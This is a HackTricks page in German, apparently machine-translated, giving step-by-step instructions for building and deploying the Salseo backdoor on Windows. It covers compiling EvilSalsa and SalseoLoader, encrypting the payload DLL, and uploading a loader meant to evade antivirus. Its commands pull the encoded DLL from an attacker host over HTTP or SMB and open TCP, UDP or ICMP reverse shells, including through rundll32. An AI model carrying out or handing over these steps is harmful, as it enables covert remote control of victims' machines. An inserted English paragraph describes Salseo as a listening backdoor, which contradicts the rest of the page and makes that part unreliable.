hacktricks/backdoors/salseo.md

8.7 KiB

Salseo

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Kompilieren der Binärdateien

Laden Sie den Quellcode von GitHub herunter und kompilieren Sie EvilSalsa und SalseoLoader. Sie benötigen Visual Studio, um den Code zu kompilieren.

Kompilieren Sie diese Projekte für die Architektur des Windows-Systems, auf dem Sie sie verwenden werden (Wenn Windows x64 unterstützt, kompilieren Sie sie für diese Architekturen).

Sie können die Architektur auswählen innerhalb von Visual Studio im linken "Build" Tab unter "Platform Target".

(**Wenn Sie diese Optionen nicht finden können, klicken Sie auf "Project Tab" und dann auf "<Project Name> Properties")

Bauen Sie dann beide Projekte (Build -> Build Solution) (Im Log wird der Pfad der ausführbaren Datei angezeigt):

Vorbereiten des Backdoors

Zunächst müssen Sie die EvilSalsa.dll verschlüsseln. Dazu können Sie das Python-Skript encrypterassembly.py verwenden oder das Projekt EncrypterAssembly kompilieren:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

Salseo

Salseo is a backdoor that allows an attacker to maintain access to a compromised system. It is a simple backdoor that listens on a specified port and executes commands sent by the attacker. The backdoor can be compiled using MinGW and works on Windows systems.

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, jetzt hast du alles, was du brauchst, um das gesamte Salseo-Ding auszuführen: die kodierte EvilDalsa.dll und das Binärfile des SalseoLoader.

Lade das SalseoLoader.exe-Binärfile auf die Maschine hoch. Es sollte von keinem AV erkannt werden...

Führe den Backdoor aus

Erhalte eine TCP-Reverse-Shell (Laden der codierten DLL über HTTP)

Denke daran, einen nc als Reverse-Shell-Listener zu starten und einen HTTP-Server zu starten, um das kodierte EvilSalsa bereitzustellen.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Erhalt eines UDP-Reverse-Shells (Herunterladen einer codierten DLL über SMB)

Denken Sie daran, einen nc als Reverse-Shell-Listener zu starten und einen SMB-Server bereitzustellen, um das codierte evilsalsa herunterzuladen (impacket-smbserver).

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Erhalt eines ICMP-Reverse-Shells (codierte DLL bereits im Opfer)

Dieses Mal benötigen Sie ein spezielles Tool im Client, um den Reverse-Shell zu empfangen. Downloaden Sie: https://github.com/inquisb/icmpsh

Deaktivieren von ICMP-Antworten:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Führen Sie den Client aus:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

Innerhalb des Opfers führen wir das Salseo-Ding aus:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Kompilieren von SalseoLoader als DLL und Exportieren der Hauptfunktion

Öffnen Sie das SalseoLoader-Projekt mit Visual Studio.

Fügen Sie vor der Hauptfunktion hinzu: [DllExport]

Installieren Sie DllExport für dieses Projekt

Tools --> NuGet-Paket-Manager --> NuGet-Pakete für Lösung verwalten...

Suchen Sie nach dem DllExport-Paket (im Bereich Durchsuchen) und klicken Sie auf Installieren (und akzeptieren Sie das Popup)

Im Projektordner sind die Dateien DllExport.bat und DllExport_Configure.bat erschienen

Deinstallieren Sie DllExport

Klicken Sie auf Deinstallieren (ja, es ist seltsam, aber vertrauen Sie mir, es ist notwendig)

Visual Studio beenden und DllExport_configure ausführen

Einfach Visual Studio beenden

Gehen Sie dann zu Ihrem SalseoLoader-Ordner und führen Sie DllExport_Configure.bat aus

Wählen Sie x64 (wenn Sie es in einem x64-System verwenden möchten, das war mein Fall), wählen Sie System.Runtime.InteropServices (im Namespace für DllExport) und klicken Sie auf Anwenden

Öffnen Sie das Projekt erneut mit Visual Studio

[DllExport] sollte nicht mehr als Fehler markiert sein

Lösung erstellen

Wählen Sie Ausgabetyp = Klassenbibliothek (Projekt --> SalseoLoader-Eigenschaften --> Anwendung --> Ausgabetyp = Klassenbibliothek)

Wählen Sie die x64-Plattform (Projekt --> SalseoLoader-Eigenschaften --> Erstellen --> Zielplattform = x64)

Um die Lösung zu erstellen: Build --> Lösung erstellen (Im Ausgabekonsole wird der Pfad der neuen DLL angezeigt)

Testen Sie die generierte DLL

Kopieren Sie die DLL und fügen Sie sie ein, wo Sie sie testen möchten.

Ausführen:

rundll32.exe SalseoLoader.dll,main

Wenn kein Fehler angezeigt wird, haben Sie wahrscheinlich eine funktionierende DLL!!

Erhalten Sie eine Shell unter Verwendung der DLL

Vergessen Sie nicht, einen HTTP Server zu verwenden und einen nc Listener einzurichten

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD steht für Command Prompt, was die Befehlszeile in Windows-Betriebssystemen bezeichnet.

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: